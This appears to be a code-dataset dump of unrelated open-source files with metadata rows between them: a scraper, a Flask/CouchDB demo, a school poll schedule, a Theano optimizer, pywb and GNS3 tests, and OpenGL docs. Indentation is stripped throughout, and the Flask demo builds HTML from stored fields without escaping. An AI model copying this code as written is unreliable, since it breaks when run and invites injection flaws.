item(head, "start_page", "prism.startingPage")
item(head, "end_page", "prism.endingPage")
item(head, "issn", "prism.issn")
item(head, "abstract", "dc.description")
date = meta(head, 'dc.date')
if date:
m = re.match(r'(\d+)-(\d+)-(\d+)', date)
if m:
year = m.group(1)
month = m.group(2)
day = m.group(3)
if year:
print "year\t%s" % year
if month:
print "month\t%s" % month
if day:
print "day\t%s" % day
# authors
authors = head.findAll("meta", {"name":"dc.creator"})
if authors:
for a in authors:
print "author\t%s" % a['content']
print "doi\t%s" % doi
print "end_tsv"
print "status\tok"
# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
try:
handle(url)
except Exception, e:
import traceback
line = traceback.tb_lineno(sys.exc_info()[2])
print "\t".join(["status", "error", "There was an internal error processing this request. Please report this to bugs@citeulike.org quoting error code %d." % line])
raise
| bsd-3-clause | 8,792,032,125,478,959,000 | 23.108108 | 164 | 0.622478 | false | 2.905537 | false | false | false |
soellman/copernicus | cpc/dataflow/resource.py | 2 | 4264 | # This file is part of Copernicus
# http://www.copernicus-computing.org/
#
# Copyright (C) 2011, Sander Pronk, Iman Pouya, Erik Lindahl, and others.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import logging
import json
log=logging.getLogger(__name__)
import cpc.util
import run
import cpc.command
class ResourceList:
"""A list of resources."""
def __init__(self):
self.rsrc=dict()
def set(self, name, value):
"""Set a specific value."""
self.rsrc[name]=value
def get(self, name):
"""Get a value with a specific name."""
return self.rsrc.get(name)
def getValue(self):
"""Return a Value object with all settings."""
retDict=dict()
for name, item in self.rsrc.iteritems():
retDict[name] = run.IntValue(item)
return run.DictValue(retDict)
def iteritems(self):
return self.rsrc.iteritems()
def empty(self):
return len(self.rsrc) == 0
class Resources:
"""Class describing minimum, maximum, and optimal command resources.
For use in functions that have min/max/optimal resources."""
def __init__(self, inputValue=None):
self.min=ResourceList()
self.max=ResourceList()
self.workers=dict()
if inputValue is not None:
self.getInputValue(inputValue)
def getInputValue(self, inputValue):
# read in min values
for name, item in inputValue.value["min"].value.iteritems():
self.min.set(name, int(item.value))
# read in max values
for name, item in inputValue.value["max"].value.iteritems():
self.max.set(name, int(item.value))
# read worker items
for workerName, worker in inputValue.value["workers"].value.iteritems():
if workerName not in self.workers:
self.workers[workerName]=ResourceList()
for name, item in worker.value.iteritems():
self.workers[workerName].set(name, int(item))
def setOutputValue(self):
"""Create a Value object based on the settings in this object."""
workerDict=dict()
for workerName, item in self.workers:
workerDict[workerName] = item.getValue()
return run.RecordValue( { "min": self.min.getValue(),
"max": self.max.getValue(),
"workers": run.DictValue(workerDict) } )
def updateCmd(self, cmd):
"""Set the command's resources from an input value."""
for name, item in self.min.iteritems():
cmd.addMinRequired(cpc.command.Resource(name, item))
for name, item in self.max.iteritems():
cmd.addMaxAllowed(cpc.command.Resource(name, item))
def save(self,filename):
svf=dict()
svf['min']=self.min.rsrc
svf['max']=self.max.rsrc
wrkrs=dict()
for name, w in self.workers.iteritems():
wrkrs[name] = w.rsrc
svf['workers']=wrkrs
fout=open(filename, 'w')
fout.write(json.dumps(svf))
fout.write('\n')
fout.close()
def load(self, filename):
fin=open(filename, 'r')
svf=json.loads(fin.read())
fin.close()
for name, value in svf['min'].iteritems():
self.min.set(name, int(value))
for name, value in svf['max'].iteritems():
self.max.set(name, int(value))
for name, w in svf['workers'].iteritems():
if name not in self.workers:
self.workers[name] = ResourceList()
for itemname, value in w:
self.workers[name].set(itemname, int(value))
| gpl-2.0 | -8,518,917,515,898,427,000 | 33.112 | 80 | 0.615385 | false | 3.94085 | false | false | false |
LennartFr/Hackathons | FlaskCloudant/welcome.py | 1 | 3515 | # Copyright 2015 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from flask import Flask, jsonify
import json
import requests
from flask import Flask, render_template, request, url_for
import couchdb, couchdb.mapping
from couchdb import Database,Server, Session
from couchdb.mapping import Document, TextField, IntegerField, DateTimeField
from datetime import datetime
import platform
from mymethods import selectdb
app = Flask(__name__)
@app.route('/')
def Welcome():
print ("Welcome.py")
return app.send_static_file('index.html')
@app.route('/listdbs', methods = ['POST', 'GET'])
def listdbs():
srv = request.form['srv']
couch=selectdb(srv)
databases= "<h1>Databases1</h1><hr>"
server = couch
for db in server:
print (db)
databases=databases+" "+ db +"<br>"
return databases
#---------------------------------------------------
#app.route('/api/createdbdlg')
def createdbdlg():
print ("Createdbdlg")
return app.send_static_file('index.html')
#----------------------------------------------------
@app.route('/createdb', methods = ['POST', 'GET'])
def createdb():
db = request.form['db']
srv = request.form['srv']
print ("Database "+ db)
couch=selectdb(srv)
print ("Creating database "+ db)
rc = couch.create(db)
return "created database "+ db
#---------------------------------------------------
@app.route('/dbinsert', methods=['GET','POST'])
def dbinsert():
srv = request.form['srv']
database = request.form['database']
id = request.form['id']
name = request.form['name']
age = request.form['age']
health = request.form['health']
couch=selectdb(srv)
db = couch[database]
doc = ({'name': name,'age':age,'health': health})
db.save(doc)
return "hit kom vi "+ srv + " database " + database + " name: " + name + " age "+ age + " health: "+ health
#------------------------------------
@app.route('/classprint', methods = ['POST'])
def classprint():
srv = request.form['srv']
db = request.form['db']
print ("Classprint DB : "+ db)
couch=selectdb(srv)
db = couch[db]
record = "<h1>Records</h1><table><hr>"
for id in db:
#print (id)
doc = db[id]
rid = doc['_id']
name = doc['name']
age = doc['age']
health = doc['health']
rec = "<tr><td>Id: "+rid+"<td>Name: <td>"+name + "<td> Age: "+str(age)+"<td> Health: "+health+"</tr>"
record=record+rec
record=record+"</table>"
print ("Classprint")
return record
@app.route('/jinja2')
def jinja2():
print ("Jinja2")
return render_template('template.html', my_string="Wheeeee!", my_list=['database1','database2','database3'])
#------------------------------------------------
port = os.getenv('PORT', '5000')
print ("Welcome.py")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(port))
| apache-2.0 | -1,425,923,854,102,895,400 | 29.042735 | 114 | 0.579232 | false | 3.642487 | false | false | false |
unicefuganda/edtrac | edtrac_project/settings/schedule.py | 1 | 6645 | import datetime
from datetime import date
#All term schedulled polls are computed based on these dates
#these dates are necessary for the system to work properly and
#should be entered every beginning of year. See _next_term_question_date()
FIRST_TERM_BEGINS = datetime.datetime(2014, 2, 3)
SECOND_TERM_BEGINS = datetime.datetime(2014, 5, 19)
THIRD_TERM_BEGINS = datetime.datetime(2014, 9, 8)
# Current term start and end dates
SCHOOL_TERM_START = FIRST_TERM_BEGINS
SCHOOL_TERM_END = datetime.datetime(2014, 4, 25)
SCHOOL_HOLIDAYS=[
# (start_of_holiday_datetime, end_of_holidate_datetime),
# (start_of_holiday2_datetime...),
# (,),
# ...
#start of year holiday season
(datetime.datetime(2014, 1, 1), datetime.datetime(2014, 2, 2)),
#public holidays
(datetime.datetime(2014, 1, 26), '1d'), #Liberation day
(datetime.datetime(2014, 3, 8), '1d'), #Women's day
(datetime.datetime(2014, 4, 18), datetime.datetime(2014, 4, 21)), #Easter holiday
(datetime.datetime(2014, 5, 1), '1d'), #Labour day
(datetime.datetime(2014, 6, 3), '1d'), #Uganda Martyrs' Day
(datetime.datetime(2014, 6, 9), '1d'), #Heroes' day
(datetime.datetime(2014, 10, 9), '1d'), #Independence Day
(datetime.datetime(2014, 12, 6), datetime.datetime(2014, 12, 31)), #Xmas holiday
#TBD
(datetime.datetime(2014, 8, 8), '1d'), #Idd El Fitri
(datetime.datetime(2014, 10, 15), '1d'), #Idd Adhua
]
WEEKLY = [
# Term one
date(2014, 2, 14), # First poll delayed by a day.
date(2014, 2, 20),
date(2014, 2, 27),
date(2014, 3, 6),
date(2014, 3, 13),
date(2014, 3, 20),
date(2014, 3, 27),
date(2014, 4, 3),
date(2014, 4, 10),
date(2014, 4, 17),
date(2014, 4, 24),
# Term two
date(2014, 5, 22),
date(2014, 5, 29),
date(2014, 6, 5),
date(2014, 6, 12),
date(2014, 6, 19),
date(2014, 6, 26),
date(2014, 7, 3),
date(2014, 7, 10),
date(2014, 7, 17),
date(2014, 7, 24),
date(2014, 7, 31),
date(2014, 8, 7),
# Term three
date(2014, 9, 11),
date(2014, 9, 18),
date(2014, 9, 25),
date(2014, 10, 2),
#date(2014, 10, 9), Independence Day
date(2014, 10, 10),
date(2014, 10, 16),
date(2014, 10, 23),
date(2014, 10, 30),
date(2014, 11, 6),
date(2014, 11, 13),
date(2014, 11, 20),
date(2014, 11, 27),
date(2014, 12, 4),
]
VIOLENCE = [
# Term one
date(2014, 2, 24),
date(2014, 3, 24),
date(2014, 4, 22),
# Term two
date(2014, 5, 26),
date(2014, 6, 23),
date(2014, 7, 28),
# Term three
date(2014, 9, 29),
date(2014, 10, 27),
date(2014, 11, 24),
]
HEAD_MEALS = [
# Term one
date(2014, 2, 21),
date(2014, 3, 28),
date(2014, 4, 25),
# Term two
date(2014, 5, 23),
date(2014, 6, 27),
date(2014, 7, 25),
# Term three
date(2014, 9, 26),
date(2014, 10, 24),
date(2014, 11, 28),
]
SMC_MEALS = [
# Term one
date(2014, 2, 24),
date(2014, 3, 24),
date(2014, 4, 22),
# Term two
date(2014, 5, 26),
date(2014, 6, 23),
date(2014, 7, 28),
# Term three
date(2014, 9, 29),
date(2014, 10, 27),
date(2014, 11, 24),
]
GEM = [
# Term one
date(2014, 2, 21),
date(2014, 3, 28),
date(2014, 4, 25),
# Term two
date(2014, 5, 23),
date(2014, 6, 27),
date(2014, 7, 25),
# Term three
date(2014, 9, 26),
date(2014, 10, 24),
date(2014, 11, 28),
]
TEACHER_DEPLOYMENT = [
date(2014, 2, 21),
date(2014, 6, 6),
date(2014, 10, 3),
]
P6_ENROLLMENT = [
date(2014, 2, 26),
date(2014, 5, 28),
date(2014, 9, 17),
]
P3_ENROLLMENT = [
date(2014, 2, 28),
date(2014, 5, 30),
date(2014, 9, 19),
]
ENROLLMENT = [
date(2014, 3, 4),
date(2014, 6, 11),
date(2014, 10, 7),
]
UPE_GRANT = [
date(2014, 3, 5),
date(2014, 6, 25),
date(2014, 10, 8),
]
SMC_MONITORING = [
date(2014, 4, 23),
date(2014, 8, 1),
date(2014, 11, 26),
]
MONITORING = [
date(2014, 4, 23),
date(2014, 8, 1),
date(2014, 11, 26),
]
WATER_SOURCE = [
date(2014, 3, 19),
date(2014, 6, 17),
date(2014, 10, 13),
]
FUNCTIONAL_WATER_SOURCE = [
date(2014, 3, 21),
date(2014, 6, 18),
date(2014, 10, 14),
]
POLL_DATES = {
'edtrac_head_teachers_weekly': WEEKLY,
'edtrac_upe_grant_headteacher_termly': UPE_GRANT,
'edtrac_teacher_deployment_headteacher_termly': TEACHER_DEPLOYMENT,
'edtrac_script_water_source': WATER_SOURCE,
'edtrac_script_functional_water_source': FUNCTIONAL_WATER_SOURCE,
'edtrac_p6_enrollment_headteacher_termly': P6_ENROLLMENT,
'edtrac_headteacher_violence_monthly': VIOLENCE,
'edtrac_head_teachers_monthly': TEACHER_DEPLOYMENT,
'edtrac_p3_enrollment_headteacher_termly': P3_ENROLLMENT,
'edtrac_headteacher_meals_monthly': HEAD_MEALS,
'edtrac_head_teachers_midterm': MONITORING,
'edtrac_school_enrollment_termly': ENROLLMENT,
'edtrac_smc_weekly': WEEKLY,
'edtrac_smc_termly': SMC_MONITORING,
'edtrac_smc_monthly': SMC_MEALS,
'edtrac_p3_teachers_weekly': WEEKLY,
'edtrac_p6_teachers_weekly': WEEKLY,
'edtrac_gem_monthly': GEM,
}
GROUPS = {'Teachers' : [],
'Head Teachers' : ['edtrac_head_teachers_weekly',
'edtrac_upe_grant_headteacher_termly',
'edtrac_teacher_deployment_headteacher_termly',
'edtrac_script_water_source',
'edtrac_script_functional_water_source',
'edtrac_p6_enrollment_headteacher_termly',
'edtrac_headteacher_violence_monthly',
'edtrac_head_teachers_monthly',
'edtrac_p3_enrollment_headteacher_termly',
'edtrac_school_enrollment_termly',
'edtrac_head_teachers_midterm',
'edtrac_headteacher_meals_monthly'],
'SMC' : ['edtrac_smc_weekly',
'edtrac_smc_termly',
'edtrac_smc_monthly'],
'GEM': ['edtrac_gem_monthly'],
'p3' : ['edtrac_p3_teachers_weekly'],
'p6' : ['edtrac_p6_teachers_weekly']}
| bsd-3-clause | -8,855,191,989,186,216,000 | 25.794355 | 85 | 0.53228 | false | 2.908096 | false | false | false |
mtanti/where-image | experiments/where_image/architecture/optimizers.py | 1 | 3775 | from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip
import theano
import theano.tensor as T
import math
import numpy as np
from architecture.layer import *
floatX = theano.config.floatX
##################################################################################################################################
class Optimizer(object):
#################################################################
def __init__(self):
pass
#################################################################
def compile(self, params, grads):
raise NotImplementedError()
#################################################################
def init(self):
raise NotImplementedError()
#################################################################
def next_update_list(self):
raise NotImplementedError()
##################################################################################################################################
class Adam(Optimizer):
#################################################################
def __init__(self, gradient_clipping_magnitude=None, learning_rate=0.001, epsilon=1e-8, beta1=0.9, beta2=0.999):
super(Adam, self).__init__()
self.gradient_clipping_magnitude = gradient_clipping_magnitude
self.learning_rate = learning_rate
self.epsilon = epsilon
self.beta1 = beta1
self.beta2 = beta2
self.params = None
self.grads = None
self.ms = None
self.vs = None
self.t = None
#################################################################
def compile(self, params, grads):
self.params = params
if self.gradient_clipping_magnitude is None:
self.grads = grads
else:
self.grads = [ T.clip(g, -self.gradient_clipping_magnitude, self.gradient_clipping_magnitude) for g in grads ]
self.ms = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ]
self.vs = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ]
self.t = theano.shared(np.array(0, dtype='int64'))
self.init()
#################################################################
def init(self):
for m in self.ms:
m.set_value(np.zeros_like(m.get_value(), dtype=floatX))
for v in self.vs:
v.set_value(np.zeros_like(v.get_value(), dtype=floatX))
self.t.set_value(np.array(1, dtype='int64'))
#################################################################
def next_update_list(self):
if self.params is None:
raise ValueError('Optimizer has not been compiled yet.')
new_ms = [ self.beta1*m + (1 - self.beta1)*g for (m,g) in zip(self.ms, self.grads) ]
new_vs = [ self.beta2*v + (1 - self.beta2)*T.sqr(g) for (v,g) in zip(self.vs, self.grads) ]
ms_hat = [ m/T.cast(1 - T.pow(self.beta1, self.t), floatX) for m in new_ms ]
vs_hat = [ v/T.cast(1 - T.pow(self.beta2, self.t), floatX) for v in new_vs ]
return (
[ (m, new_m) for (m,new_m) in zip(self.ms, new_ms) ] +
[ (v, new_v) for (v,new_v) in zip(self.vs, new_vs) ] +
[ (self.t, self.t + 1) ] +
[ (p, p - self.learning_rate*m_hat/(T.sqrt(v_hat) + self.epsilon)) for (p,m_hat,v_hat) in zip(self.params, ms_hat, vs_hat) ]
)
| mit | -4,613,927,694,636,940,000 | 41.390805 | 140 | 0.441589 | false | 4.148352 | false | false | false |
jcushman/pywb | pywb/utils/test/test_loaders.py | 2 | 4867 | #=================================================================
r"""
# LimitReader Tests
>>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10).read(26)
'abcdefghji'
>>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8).readline(26)
'abcdefgh'
>>> LimitReader.wrap_stream(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8), 4).readline(26)
'abcd'
>>> read_multiple(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10), [2, 2, 20])
'efghji'
# zero-length read
>>> LimitReader(BytesIO('a'), 0).readline(0)
''
# don't wrap if invalid length
>>> b = BytesIO('b')
>>> LimitReader.wrap_stream(b, 'abc') == b
True
# BlockLoader Tests (includes LimitReader)
# Ensure attempt to read more than 100 bytes, reads exactly 100 bytes
>>> len(BlockLoader().load(test_cdx_dir + 'iana.cdx', 0, 100).read('400'))
100
# no length specified, read full amount requested
>>> len(BlockLoader().load(to_file_url(test_cdx_dir + 'example.cdx'), 0, -1).read(400))
400
# no such file
>>> len(BlockLoader().load('_x_no_such_file_', 0, 100).read('400'))
Traceback (most recent call last):
IOError: [Errno 2] No such file or directory: '_x_no_such_file_'
# HMAC Cookie Maker
>>> BlockLoader(HMACCookieMaker('test', 'test', 5)).load('http://example.com', 41, 14).read()
'Example Domain'
# fixed cookie, range request
>>> BlockLoader('some=value').load('http://example.com', 41, 14).read()
'Example Domain'
# range request
>>> BlockLoader().load('http://example.com', 1262).read()
'</html>\n'
# test with extra id, ensure 4 parts of the A-B=C-D form are present
>>> len(re.split('[-=]', HMACCookieMaker('test', 'test', 5).make('extra')))
4
# cookie extract tests
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'a')
'b'
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'c')
'd'
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'x')
>>> extract_client_cookie(dict(HTTP_COOKIE='x'), 'x')
>>> extract_client_cookie({}, 'y')
# append_post_query
>>> append_post_query('http://example.com/?abc=def', 'foo=bar')
'http://example.com/?abc=def&foo=bar'
>>> append_post_query('http://example.com/', '')
'http://example.com/'
>>> append_post_query('http://example.com/', 'foo=bar')
'http://example.com/?foo=bar'
# extract_post_query tests
# correct POST data
>>> post_data = 'foo=bar&dir=%2Fbaz'
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data))
'foo=bar&dir=/baz'
# unsupported method
>>> extract_post_query('PUT', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data))
# unsupported type
>>> extract_post_query('POST', 'text/plain', len(post_data), BytesIO(post_data))
# invalid length
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', 'abc', BytesIO(post_data))
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', 0, BytesIO(post_data))
# length too short
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) - 4, BytesIO(post_data))
'foo=bar&dir=%2'
# length too long
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) + 4, BytesIO(post_data))
'foo=bar&dir=/baz'
# test read_last_line
>>> read_last_line(BytesIO('A\nB\nC'))
'C'
>>> read_last_line(BytesIO('Some Line\nLonger Line\nLongest Last Line LL'), offset=8)
'Longest Last Line LL'
>>> read_last_line(BytesIO('A\nBC'))
'BC'
>>> read_last_line(BytesIO('A\nBC\n'))
'BC\n'
>>> read_last_line(BytesIO('ABC'))
'ABC'
"""
#=================================================================
import re
import os
import pytest
from io import BytesIO
from pywb.utils.loaders import BlockLoader, HMACCookieMaker, to_file_url
from pywb.utils.loaders import LimitReader, extract_client_cookie, extract_post_query
from pywb.utils.loaders import append_post_query, read_last_line
from pywb.utils.bufferedreaders import DecompressingBufferedReader
from pywb import get_test_dir
test_cdx_dir = get_test_dir() + 'cdx/'
def read_multiple(reader, inc_reads):
result = None
for x in inc_reads:
result = reader.read(x)
return result
def seek_read_full(seekable_reader, offset):
seekable_reader.seek(offset)
seekable_reader.readline() #skip
return seekable_reader.readline()
def test_s3_read_1():
pytest.importorskip('boto')
res = BlockLoader().load('s3://aws-publicdatasets/common-crawl/crawl-data/CC-MAIN-2015-11/segments/1424936462700.28/warc/CC-MAIN-20150226074102-00159-ip-10-28-5-156.ec2.internal.warc.gz',
offset=53235662,
length=2526)
buff = res.read()
assert len(buff) == 2526
reader = DecompressingBufferedReader(BytesIO(buff))
assert reader.readline() == 'WARC/1.0\r\n'
assert reader.readline() == 'WARC-Type: response\r\n'
if __name__ == "__main__":
import doctest
doctest.testmod()
| gpl-3.0 | 7,037,224,367,784,346,000 | 27.629412 | 191 | 0.66016 | false | 3.041875 | true | false | false |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/OpenGL/GL/ARB/uniform_buffer_object.py | 4 | 5168 | '''OpenGL extension ARB.uniform_buffer_object
This module customises the behaviour of the
OpenGL.raw.GL.ARB.uniform_buffer_object to provide a more
Python-friendly API
Overview (from the spec)
This extension introduces the concept of a group of GLSL uniforms
known as a "uniform block", and the API mechanisms to store "uniform
blocks" in GL buffer objects.
The extension also defines both a standard cross-platform layout in
memory for uniform block data, as well as mechanisms to allow the GL
to optimize the data layout in an implementation-defined manner.
Prior to this extension, the existing interface for modification of
uniform values allowed modification of large numbers of values using
glUniform* calls, but only for a single uniform name (or a uniform
array) at a time. However, updating uniforms in this manner may not
map well to heterogenous uniform data structures defined for a GL
application and in these cases, the application is forced to either:
A) restructure their uniform data definitions into arrays
or
B) make an excessive number of calls through the GL interface
to one of the Uniform* variants.
These solutions have their disadvantages. Solution A imposes
considerable development overhead on the application developer.
Solution B may impose considerable run-time overhead on the
application if the number of uniforms modified in a given frame of
rendering is sufficiently large.
This extension provides a better alternative to either (A) or (B) by
allowing buffer object backing for the storage associated with all
uniforms of a given GLSL program.
Storing uniform blocks in buffer objects enables several key use
cases:
- sharing of uniform data storage between program objects and
between program stages
- rapid swapping of sets of previously defined uniforms by storing
sets of uniform data on the GL server
- rapid updates of uniform data from both the client and the server
The data storage for a uniform block can be declared to use one of
three layouts in memory: packed, shared, or std140.
- "packed" uniform blocks have an implementation-dependent data
layout for efficiency, and unused uniforms may be eliminated by
the compiler to save space.
- "shared" uniform blocks, the default layout, have an implementation-
dependent data layout for efficiency, but the layout will be uniquely
determined by the structure of the block, allowing data storage to be
shared across programs.
- "std140" uniform blocks have a standard cross-platform cross-vendor
layout (see below). Unused uniforms will not be eliminated.
Any uniforms not declared in a named uniform block are said to
be part of the "default uniform block".
While uniforms in the default uniform block are updated with
glUniform* entry points and can have static initializers, uniforms
in named uniform blocks are not. Instead, uniform block data is updated
using the routines that update buffer objects and can not use static
initializers.
Rules and Concepts Guiding this Specification:
For reference, a uniform has a "uniform index" (subsequently
referred to as "u_index) and also a "uniform location" to
efficiently identify it in the uniform data store of the
implementation. We subsequently refer to this uniform data store of
the implementation as the "uniform database".
A "uniform block" only has a "uniform block index" used for queries
and connecting the "uniform block" to a buffer object. A "uniform
block" has no "location" because "uniform blocks" are not updated
directly. The buffer object APIs are used instead.
Properties of Uniforms and uniform blocks:
a) A uniform is "active" if it exists in the database and has a valid
u_index.
b) A "uniform block" is "active" if it exists in the database and
has a valid ub_index.
c) Uniforms and "uniform blocks" can be inactive because they don't
exist in the source, or because they have been removed by dead
code elimination.
d) An inactive uniform has u_index == INVALID_INDEX.
e) An inactive uniform block has ub_index == INVALID_INDEX.
f) A u_index or ub_index of INVALID_INDEX generates the
INVALID_VALUE error if given as a function argument.
g) The default uniform block, which is not assigned any ub_index, uses a
private, internal data storage, and does not have any buffer object
associated with it.
h) An active uniform that is a member of the default uniform block has
location >= 0 and it has offset == stride == -1.
i) An active uniform that is a member of a named uniform block has
location == -1.
j) A uniform location of -1 is silently ignored if given as a function
argument.
k) Uniform block declarations may not be nested
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/uniform_buffer_object.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.uniform_buffer_object import *
### END AUTOGENERATED SECTION | agpl-3.0 | 973,823,161,348,524,300 | 42.436975 | 74 | 0.766834 | false | 4.201626 | false | false | false |
anaruse/chainer | tests/chainer_tests/distributions_tests/test_normal.py | 1 | 1214 | from chainer import distributions
from chainer import testing
import numpy
@testing.parameterize(*testing.product({
'shape': [(3, 2), (1,)],
'is_variable': [True, False],
'sample_shape': [(3, 2), ()],
}))
@testing.fix_random()
@testing.with_requires('scipy')
class TestNormal(testing.distribution_unittest):
scipy_onebyone = True
def setUp_configure(self):
from scipy import stats
self.dist = distributions.Normal
self.scipy_dist = stats.norm
self.test_targets = set([
"batch_shape", "cdf", "entropy", "event_shape", "icdf", "log_cdf",
"log_prob", "log_survival", "mean", "prob", "sample", "stddev",
"support", "survival", "variance"])
loc = numpy.random.uniform(-1, 1, self.shape).astype(numpy.float32)
scale = numpy.exp(
numpy.random.uniform(-1, 1, self.shape)).astype(numpy.float32)
self.params = {"loc": loc, "scale": scale}
self.scipy_params = {"loc": loc, "scale": scale}
def sample_for_test(self):
smp = numpy.random.normal(
size=self.sample_shape + self.shape).astype(numpy.float32)
return smp
testing.run_module(__name__, __file__)
| mit | -3,783,134,970,045,142,500 | 30.128205 | 78 | 0.602965 | false | 3.508671 | true | false | false |
Carreau/Love | love/github.py | 1 | 2421 | import github
import getpass
import json
import keyring
import subprocess
import requests
GITHUB_NEW_TOKEN_URI = 'https://github.com/settings/tokens/new'
fake_username = 'love tools'
def get_auth_token(token):
if token is not None:
return token
token = keyring.get_password('github', fake_username)
if token is not None:
return token
print("Please enter your github username and password. These are not "
"stored, only used to get an oAuth token. You can revoke this at "
"any time on Github.")
user = input("Username: ")
pw = getpass.getpass("Password: ")
auth_request = {
"scopes": [
"public_repo",
],
"note": "Love tools",
"note_url": "https://github.com/Carreau/love",
}
response = requests.post('https://api.github.com/authorizations',
auth=(user, pw), data=json.dumps(auth_request))
if response.status_code == 401 and response.headers.get('X-GitHub-OTP') == 'required; sms':
print("Your login API resquest a SMS one time password")
sms_pw = getpass.getpass("SMS password: ")
response = requests.post('https://api.github.com/authorizations',
auth=(user, pw),
data=json.dumps(auth_request),
headers={'X-GitHub-OTP':sms_pw})
response.raise_for_status()
token = json.loads(response.text)['token']
keyring.set_password('github', fake_username, token)
return token
def setup_github_credentials(log):
token = get_auth_token(None)
gh = github.Github(token)
user = gh.get_user()
log.info('Logged in on GitHub as %s ', user.name)
return token, user
def setup_github_repository(user, proposal, log):
from github import UnknownObjectException
try:
repo = user.get_repo(proposal)
log.info('It appears like %s repository already exists, using it as remote', repr(proposal))
except UnknownObjectException:
repo = user.create_repo(proposal)
ssh_url = repo.ssh_url
slug = repo.full_name
log.info('Working with repository %s', slug)
# Clone github repo locally, over SSH an chdir into it
log.info("Cloning github repository locally")
log.info("Calling subprocess : %s", ' '.join(['git', 'clone' , ssh_url]))
subprocess.call(['git', 'clone' , ssh_url])
return slug
| mit | 3,058,954,655,249,858,600 | 30.441558 | 100 | 0.625361 | false | 3.836767 | false | false | false |
GNS3/gns3-server | tests/handlers/api/controller/test_drawing.py | 1 | 3125 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gns3server.controller.drawing import Drawing
async def test_create_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
assert response.status == 201
assert response.json["drawing_id"] is not None
async def test_get_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.get("/projects/{}/drawings/{}".format(project.id, response.json["drawing_id"]))
assert response.status == 200
assert response.json["x"] == 10
async def test_update_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
response = await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.put("/projects/{}/drawings/{}".format(project.id, response.json["drawing_id"]), {"x": 42})
assert response.status == 201
assert response.json["x"] == 42
async def test_list_drawing(controller_api, project):
params = {
"svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>',
"x": 10,
"y": 20,
"z": 0
}
await controller_api.post("/projects/{}/drawings".format(project.id), params)
response = await controller_api.get("/projects/{}/drawings".format(project.id))
assert response.status == 200
assert len(response.json) == 1
async def test_delete_drawing(controller_api, project):
drawing = Drawing(project)
project._drawings = {drawing.id: drawing}
response = await controller_api.delete("/projects/{}/drawings/{}".format(project.id, drawing.id))
assert response.status == 204
assert drawing.id not in project.drawings
| gpl-3.0 | -2,907,817,951,550,079,000 | 34.91954 | 137 | 0.64512 | false | 3.483835 | false | false | false |
DataDog/integrations-core | datadog_checks_base/tests/test_utils.py | 1 | 8576 | # -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY2, PY3
